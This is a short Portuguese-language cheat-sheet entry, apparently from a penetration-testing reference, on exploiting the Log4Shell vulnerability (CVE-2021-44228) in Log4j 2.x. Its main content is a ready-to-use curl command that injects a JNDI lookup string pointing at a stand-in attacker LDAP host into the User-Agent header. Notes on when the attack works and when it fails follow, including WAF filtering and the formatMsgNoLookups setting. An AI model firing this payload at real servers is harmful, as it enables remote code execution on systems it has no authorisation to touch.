log4j JNDI (CVE-2021-44228)
curl -H 'User-Agent: ${jndi:ldap://<attacker>/a}' <url>
Exploração da vulnerabilidade Log4Shell mediante injeção JNDI em cabeçalhos HTTP ou parâmetros.
Quando suspeitas que uma aplicação usa Log4j 2.x e não está corrigida. Log4Shell permite execução remota de código (RCE) mediante a injeção de uma string JNDI num cabeçalho (User-Agent, X-Forwarded-For, etc.) ou parâmetro. É uma das vulnerabilidades mais críticas da história.
Se a aplicação não usa Log4j ou está atualizada. Também se o alvo tem um WAF que bloqueia o padrão ${jndi:...} ou utiliza `log4j2.formatMsgNoLookups=true`.